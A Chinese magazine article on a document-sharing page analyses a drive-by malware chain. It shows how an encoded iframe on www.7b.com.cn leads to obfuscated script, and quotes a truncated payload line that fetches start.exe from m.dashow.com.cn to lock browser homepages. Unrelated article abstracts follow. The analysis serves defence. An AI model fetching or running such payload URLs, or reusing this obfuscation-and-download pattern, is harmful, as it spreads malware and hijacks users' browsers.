挖出恶意网站中的病毒

来源 :电脑爱好者 | 被引量 : 0次 | 上传用户:geniuscaobo
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。
  提醒:分析病毒存在一定风险,建议在虚拟机下操作。
  第1步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:
  
  这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。
  而“http://m.dashow.com.cn/m.html”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。
  直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。
  第2步 查看http://m.dashow.com.cn/m.html的源代码,把看的脚本段中的Execute替换为Document.Write,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的Document.Write,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用Document.Write替换掉EXECUTE,前后加脚本标记,存HTM打开。
  第3步 经过上几步的还原后终于看到了这个恶意页面的最终面目。
  on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。
  这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。
  可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。
其他文献
摘要:目的 评价内科胸腔镜检查在不明原因胸腔积液中诊断的价值。 方法 回顾性总结本科自2006年5月至2008年7月采用内科胸腔镜诊断不明原因胸腔积液的临床资料。结果 共有90例患者成功经过内科胸腔镜检查,胸腔镜下病理组织活检确诊结核性胸膜炎43例、转移性肿瘤18例、非特性慢性炎症12例、不明原因10例、肝源性3例、胸膜间皮瘤3例、淋巴瘤1例。胸腔积液诊断率为88.9%(80/90)。结核性胸膜炎
期刊
把安装程序里的DLL挖出来,就能当绿色软件用了吗?   软件是不是只有安装了才能用?当然不是,我们有绿色软件,那么有安装程序的软件是不是必须安装了才能用呢?也未必,有很多软件直接提取文件后就能用了,这样不但能使软件“绿”起来,还能防止木马或流氓软件通过捆绑等方式溜进系统。   请来几位助手   Universal Extractor(简称UE):http://www.newhua.com/soft
期刊
什么是Widget?别说你不知道!Widget就是一款基于网络的桌面小工具,在风靡美国、欧洲等地后,现在又来到了中国。它不仅看起来像漂浮在桌面上的小精灵般炫酷,更包罗了娱乐、工作、学习等多种实用功能(见图)。看腻了条列式的新闻浏览器,换成Widget的“新闻跑马灯”是不是更有趣?只要稍有些编程基础,都可以按自己的心意制作Widget!      Widget72变?照样看清楚!   变!变!变!在
期刊
【摘要】目的:探讨输卵管不孕后采用宫腔镜与腹腔镜联合诊治对妊娠结局的影响。方法:选择我院2007年5月至2011年5月收治的输卵管不孕患者80例,采取宫腔镜与腹腔镜联合诊断及治疗,就临床结果进行回顾性分析。结果:80输卵管不孕例患者依据H&R分类标准将输卵管病变分为3度,其中19例为轻度,占23.8%;中度21例,占26.2%;重度40例,占50%。不同输卵管病变程度的3组患者在年龄、人流史、不孕
期刊
Windows Live Messenger(简称WLM)历来以私密性备受白领阶层的钟爱,在网络攻击无处不在的今天,安全被提到了前所未有的高度。要防止WLM在不经意之间泄露我们的秘密,就要自己动手,构筑起WLM的网络安全防洪大坝!      安全第一坝:不让聊天记录曝光   WLM允许用户保存聊天记录,但是,却不负责任地将我们的聊天记录以明文形式保存在XML文件中。这些聊天记录文件默认情况下被保存
期刊
在Windows XP中,如果在“文件夹选项→查看”对话框中设置了显示隐藏文件,那么你会发现各个分区的根目录下会有一个名为“System Volume Information”的文件夹,包括系统还原、文件索引等功能会调用到这个文件夹,其中还有类似于“_restore{CE93CB58-6976-4C21-936E-5D9A2C37061B}\”的文件夹,不过即使你关闭了所有驱动器的系统还原,但这个
期刊
随意地给Outlook通讯录、Word和Excel文档中的朋友拨打超便宜的长途,你也做得到。   Skype与传统电话相比,在价钱上的确是便宜一些,越来越多的用户开始以Skype当作主要联络工具。但Skype毕竟是应用程序,要拨号还得先运行后才能拨打,对那些习惯电话拿起来就打的人而言,稍显不便。     好在Skype官方也想到此问题,特别推出了“Skype Office Toolbar”,把Sk
期刊
大家一定对品牌机的一键还原功能十分羡慕吧,在电脑受到病毒破坏时,只需按下“一键还原”键,电脑很快就可以恢复到出厂状态。其实一键还原并不是品牌机的专利,今天我们请来了《一键还原精灵》的作者,与大家谈谈其开发经历和软件的应用。   嘉宾介绍:利坤明   《一键还原精灵》的作者。生于上个世纪七十年代中期,广东人,毕业于西南农业大学经济管理专业。2003年初开始编写《一键备份/恢复系统》(一键还原精灵的原
期刊
在你毫不知情间,黑客已经通过你永久在线的ADSL入侵了你系统,不能让他们就这样得逞。   包月ADSL用户一般在线时间比较长,但是都比较缺乏安全防护意识,每天上网十几个小时,甚至通宵开机的人不在少数,而且还有人把自己的机器做成Web或者ftp服务器供其他人访问。这样的系统非常容易被黑客攻陷,甚至用你的ADSL账户付款购物,盗取你的金钱增加你的话费。但是,如果你能按下面的步骤操作,就能保证自己的安全
期刊
新品短信息    趋势科技推出OfficeScan Beta版  适用于微软Vista  近日趋势科技在其网站上推出企业桌面安全解决方案趋势科技OfficeScan 7.8 beta版,该产品将随着Windows Vista的问世而为其提供防病毒和其他保护。OfficeScan可以保护企业的Windows Vista计算机免遭病毒和恶意代码的攻击,包括文件病毒、宏病毒和恶意间谍软件、Java Ap
期刊